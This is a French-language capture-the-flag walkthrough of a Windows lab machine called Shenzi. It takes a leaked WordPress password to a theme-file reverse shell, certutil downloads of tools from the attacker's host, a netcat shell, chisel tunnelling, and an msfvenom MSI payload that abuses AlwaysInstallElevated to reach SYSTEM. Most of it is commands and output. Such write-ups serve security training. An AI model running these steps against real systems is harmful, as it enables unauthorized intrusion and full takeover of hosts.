Shenzi

wordpress chisel msi AlwaysInstallElevated

• Nom machine : Shenzi

• Difficulté : Intermédiaire

• OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 09:25 EDT
Nmap scan report for 192.168.218.55
Host is up (0.032s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn: 
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.218.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.45.247' is not allowed to connect to this MariaDB server
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=8/3%Time=66AE2FED%P=x86_64-pc-linux-gnu%r(
SF:NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.247'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SMB (139/445)

┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.218.55       
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       Remote IPC
	Shenzi          Disk   
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.218.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

──(kali㉿kali)-[~/oscp/shenzir]
└─$ smbclient //192.168.218.55/Shenzi
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu May 28 11:45:09 2020
  ..                                  D        0  Thu May 28 11:45:09 2020
  passwords.txt                       A      894  Thu May 28 11:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 11:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 11:45:09 2020
  why.tmp                             A      213  Thu May 28 11:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 11:45:09 2020

		12941823 blocks of size 4096. 4833534 blocks available
smb: \> promp off
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (6.6 KiloBytes/sec) (average 6.6 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (53.3 KiloBytes/sec) (average 30.2 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (28.9 KiloBytes/sec) (average 29.8 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (1.6 KiloBytes/sec) (average 22.8 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (1.3 KiloBytes/sec) (average 18.5 KiloBytes/sec)

Intéressant ...

┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ cat passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).     

5) WordPress:

   User: admin
   Password: FeltHeadwallWight357

Nous avons donc qu'il y a sûrement un site wordpress sur le port 80... Dirsearch / gobuster ne menent à rien. Nous allons essayer après un grand nombre d'essai : http://192.168.249.55/shenzi/

Wordpress (80)

┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ wpscan --url http://192.168.249.55/shenzi/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.249.55/shenzi/ [192.168.249.55]
[+] Started: Sun Aug  4 13:36:39 2024
{...}
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.249.55/shenzi/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Nous avons trouvé qu'un seul user : admin. Nous pouvions déjà le trouver sur la page d'acceuil du site wordpress. Nous avons son mot de passe dans le fichier trouvé plus haut : FeltHeadwallWight357

Accès initial

Reverse shell WordPress: Multiple MethodsHackercool Magazine

Nous allons obtenir un reverse shell à partir des thèmes.

Tout d'abord, nous copions PHP cmd à partir de :

https://www.revshells.com/

Nous avons copié le code puis nous l'avons copié dans le thème Twenty Twenty et 404.php.

Nous allons ensuite sur la page http://192.168.249.55/shenzi/wp-admin/themes/twentytwenty/404.php et collons le reverse-shell Powershell #3 (base64) du site précédent avec notre adresse ip et le port d'écoute correspondant.

Nous avons lancé un listener au même moment

┌──(kali㉿kali)-[~/oscp/shenzir]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56842
whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi>

Elévation des privilèges

Nous avons téléchargé winpeas.exe après avoir lancé un server python sur le port 80 de notre machine kali. Mais impossible de l'exécuter. Nous avons donc téléchargé nc.exe pour essayer avec un autre shell.

PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/winpeas.exe win.exe
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/Tools/nc.exe nc.exe
PS C:\users\shenzi\desktop> ./nc.exe 192.168.45.180 1235 -e cmd

──(kali㉿kali)-[~]
└─$ nc -lnvp 1235                      
listening on [any] 1235 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 56917
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\users\shenzi\desktop>win.exe
win.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
{...}

����������͹ Found Wordpress Files
File: C:\xampp\htdocs\shenzi\wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'shenzi' );
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', '' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');
define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/shenzi/');

{...}

Il fonctionne. Nous sommes également retombé sur mysql, avec l'utilisateur root et sans mot de passe.

C:\users\shenzi\desktop>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\users\shenzi\desktop> Get-ChildItem -Path "C:\" -Recurse -File -include "*mysql.exe*" -ErrorAction SilentlyContinue

    Directory: C:\xampp\mysql\bin
Mode                 LastWriteTime         Length Name                       
----                 -------------         ------ ----                       
-a----        12/10/2019   6:49 AM        3742632 mysql.exe

Impossible de l'exécuter.

Je vais tenter d'effectuer une redirection de port afin d'avoir accès à mysql et phpmyadmin.

Machine victime :

C:\users\shenzi\desktop>chisel server -p 7777 -reverse
chisel server -p 7777 -reverse
2024/08/04 11:42:41 server: Reverse tunnelling enabled
2024/08/04 11:42:41 server: Fingerprint uh8e6jJeT5akIYbRhOg4jRAeMcf6+gt4c13gfViXQKA=
2024/08/04 11:42:41 server: Listening on http://0.0.0.0:7777

Machine kali :

┌──(kali㉿kali)-[~/Tools]
└─$ ./chisel client 192.168.249.55:7777 3333:localhost:3306
2024/08/04 14:44:26 client: Connecting to ws://192.168.249.55:7777
2024/08/04 14:44:27 client: Connected (Latency 32.808945ms)

7777: port servant à lier les deux machines. 3306 : port qui m'intéresse sur la machine cible. 3333 : port que je vais utiliser pour accéder à 3306 de ma cible.

Nous n'avons rien trouvé de concluant via le port 3306. Nous avons également essayé de regarder le port 80 notamment la page phpmyadmin, rien non plus. Nous avons aussi essayé d'uploader un fichier php nous permettant d'exécuter des commandes, mais nous sommes toujours shenzi.

Shell Uploading in Web Server through PhpMyAdminHacking Articles

Nous n'avons donc pas de piste.

Nous allons retourner à notre cher WinPeas.exe. Nous avons effectivement loupé une information

AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

Nous allons encore nous aider d'Hacktricks à la différence que nous allons créer un reverse-shell plutôt qu'un ajout d'utilisateur. Dans tous les cas le fichier généré sera .msi

Page not found - HackTricksbook.hacktricks.xyz

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=4444 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi

Nous allons le télécharger sur notre machine cible et l'exécuter

PS C:\xampp\htdocs\shenzi> cd /users/shenzi/desktop
PS C:\users\shenzi\desktop> certutil -f -urlcache http://192.168.45.180/rev.msi rev.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\users\shenzi\desktop> ./rev.msi

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444                    
listening on [any] 4444 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.249.55] 57705
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Nous sommes Nt authority / system !